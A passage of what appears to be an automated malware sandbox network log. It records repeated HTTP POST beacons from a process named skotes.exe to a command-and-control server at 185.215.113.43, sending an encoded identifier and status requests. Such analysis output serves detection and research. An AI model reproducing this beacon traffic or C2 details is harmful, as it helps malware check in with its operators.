                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          105192.168.2.450184185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:25:38.072246075 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:25:39.415437937 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:25:39 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          106192.168.2.450185185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:25:41.165380955 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:25:42.497955084 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:25:42 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          107192.168.2.450186185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:25:44.134464979 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:25:45.608072042 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:25:45 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          108192.168.2.450187185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:25:47.353326082 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:25:48.689685106 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:25:48 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          109192.168.2.450188185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:25:50.324596882 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:25:51.731988907 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:25:51 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          110192.168.2.450189185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:25:53.478811979 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:25:54.810722113 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:25:54 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          111192.168.2.450190185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:25:56.450088024 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:25:57.790385008 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:25:57 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          112192.168.2.450191185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:25:59.540960073 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:00.891843081 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:26:00 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          113192.168.2.450192185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:02.615926027 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:04.024296045 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:26:03 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          114192.168.2.450193185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:05.776451111 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:07.127769947 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:26:06 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          115192.168.2.450194185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:08.761902094 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:10.130956888 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:26:09 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          116192.168.2.450195185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:11.885519028 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:13.265825033 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:26:13 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          117192.168.2.450196185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:14.899745941 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:16.371963024 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:26:16 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          118192.168.2.450197185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:18.117794991 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:19.447962999 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:26:19 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          119192.168.2.450198185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:21.087519884 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:22.425734043 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:26:22 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          120192.168.2.450199185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:24.173532009 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:26:25.514627934 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:26:25 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          121192.168.2.450200185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
